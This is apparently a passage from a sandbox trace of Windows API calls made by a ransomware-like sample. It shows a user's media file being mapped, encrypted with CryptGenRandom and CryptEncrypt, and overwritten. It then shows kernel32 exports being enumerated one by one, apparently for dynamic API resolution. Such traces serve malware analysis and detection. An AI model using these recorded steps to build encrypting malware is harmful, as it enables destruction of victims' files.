HALPmcxz\\AppData\\Roaming\\ISyuUqVLVoKe2TYf1F.mkv" [0077.181] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.181] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ISyuUqVLVoKe2TYf1F.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\isyuuqvlvoke2tyf1f.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0077.181] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=74304) returned 1 [0077.182] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0077.182] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x10d0000 [0077.182] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0077.182] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0077.182] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0077.182] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0077.182] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10f0000 [0077.184] VirtualFree (lpAddress=0x10f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.184] UnmapViewOfFile (lpBaseAddress=0x10d0000) returned 1 [0077.185] CloseHandle (hObject=0x444) returned 1 [0077.185] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.185] WriteFile (in: hFile=0x440, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0077.186] CloseHandle (hObject=0x0) returned 0 [0077.186] CloseHandle (hObject=0x440) returned 1 [0077.187] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.187] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.187] GetTickCount () returned 0x114bcea [0077.187] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.188] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0077.188] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0077.188] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0077.188] lstrlenA (lpString="kernel32.dll") returned 12 [0077.188] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0077.188] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0077.188] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0077.188] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0077.188] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0077.188] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0077.188] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0077.188] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0077.188] lstrlenA (lpString="ADDATOMA") returned 8 [0077.188] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0077.189] lstrlenA (lpString="ADDATOMW") returned 8 [0077.189] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0077.189] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0077.189] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0077.189] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0077.189] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0077.189] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0077.189] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0077.189] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0077.189] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0077.189] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0077.189] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0077.189] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0077.189] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0077.189] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0077.189] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0077.189] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0077.189] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0077.189] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0077.189] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0077.189] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0077.189] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0077.189] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0077.189] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0077.189] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0077.189] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0077.189] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0077.189] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0077.189] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0077.189] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0077.189] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0077.189] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0077.189] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0077.189] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0077.189] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0077.189] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0077.189] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0077.190] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0077.190] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0077.190] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0077.190] lstrlenA (lpString="BACKUPREAD") returned 10 [0077.190] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0077.190] lstrlenA (lpString="BACKUPSEEK") returned 10 [0077.190] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0077.190] lstrlenA (lpString="BACKUPWRITE") returned 11 [0077.190] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0077.190] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0077.190] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0077.190] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0077.190] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0077.190] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0077.190] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0077.190] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0077.190] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0077.190] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0077.190] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0077.190] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0077.190] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0077.190] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0077.190] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0077.190] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0077.190] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0077.190] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0077.190] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0077.190] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0077.190] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0077.190] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0077.190] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0077.190] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0077.190] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0077.190] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0077.190] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0077.190] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0077.190] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0077.191] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0077.191] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0077.191] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0077.191] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0077.191] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0077.191] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0077.191] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0077.191] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0077.191] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0077.191] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0077.191] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0077.191] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0077.191] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0077.191] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0077.191] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0077.191] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0077.191] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0077.191] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0077.191] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0077.191] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0077.191] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0077.191] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0077.191] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0077.191] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0077.191] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0077.191] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0077.191] lstrlenA (lpString="BEEP") returned 4 [0077.191] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0077.191] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0077.191] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0077.191] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0077.191] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0077.191] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0077.191] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0077.191] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0077.191] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0077.191] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0077.192] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0077.192] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0077.192] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0077.192] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0077.192] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0077.192] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0077.192] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0077.192] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0077.192] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0077.192] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0077.192] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0077.192] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0077.192] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0077.192] lstrlenA (lpString="CANCELIO") returned 8 [0077.192] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0077.192] lstrlenA (lpString="CANCELIOEX") returned 10 [0077.192] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0077.192] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0077.192] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0077.192] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0077.192] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0077.192] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0077.192] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0077.192] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0077.192] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0077.192] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0077.192] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0077.192] lstrlenA (lpString="CHECKELEVATION") returned 14 [0077.192] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0077.192] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0077.192] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0077.192] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0077.192] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0077.192] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0077.192] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0077.192] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0077.192] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0077.193] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0077.193] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0077.193] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0077.193] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0077.193] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0077.193] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0077.193] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0077.193] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0077.193] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0077.193] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0077.193] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0077.193] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0077.193] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0077.193] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0077.193] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0077.193] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0077.193] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0077.193] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0077.193] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0077.193] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0077.193] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0077.193] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0077.193] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0077.193] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0077.193] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0077.193] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0077.193] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0077.193] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0077.193] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0077.193] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0077.193] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0077.193] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0077.193] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0077.193] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0077.193] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0077.193] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0077.193] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0077.193] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0077.194] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0077.194] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0077.194] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0077.194] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0077.194] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0077.194] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0077.194] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0077.194] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0077.194] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0077.194] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0077.194] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0077.194] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0077.194] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0077.194] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0077.194] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0077.194] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") 